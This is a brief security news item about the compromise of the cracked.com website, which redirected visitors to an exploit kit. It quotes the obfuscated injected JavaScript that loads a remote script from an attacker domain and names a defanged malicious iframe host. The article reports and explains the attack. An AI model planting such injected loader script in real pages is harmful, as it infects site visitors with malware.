Popular websites are privileged targets for cyber criminals, a few weeks ago php.net website was compromised with the same purpose, it redirected visitors to Magnitude exploit kit compromising a great number of users.
The exploit was served with the following malicious javascript on cracked_com which sends a request to crackedcdm.com:
var tyi = “cdm.”; var itwo = “cracked”; var itto = “/”; var phw = “php”; var jfw = “src”; var fscr = “script”; var twi = “i”; var htp = “http”; var vol54 = “src”;document.write(“<”+fscr+” “+jfw+”=”+htp+”:”+itto+””+itto+””+twi+”.”+itwo+””+tyi+”com”+itto+””+twi+”.”+phw+”><”+itto+””+fscr+”>”);
The domain crackedcdm.com was registered on 2013-11-04, which suggests that attackers had the ability to serve their content from cracked_com at least that early.
Security experts have found on the Cracked_com iframe pointing to “p68ei5[dot]degreeexplore[dot]biz,” which then sent a collection of malicious Java, PDFs, HTML, and javascript files into the victim’s browser. If successful, the attackers are able to exploit the victim’s machine uploading the malware.
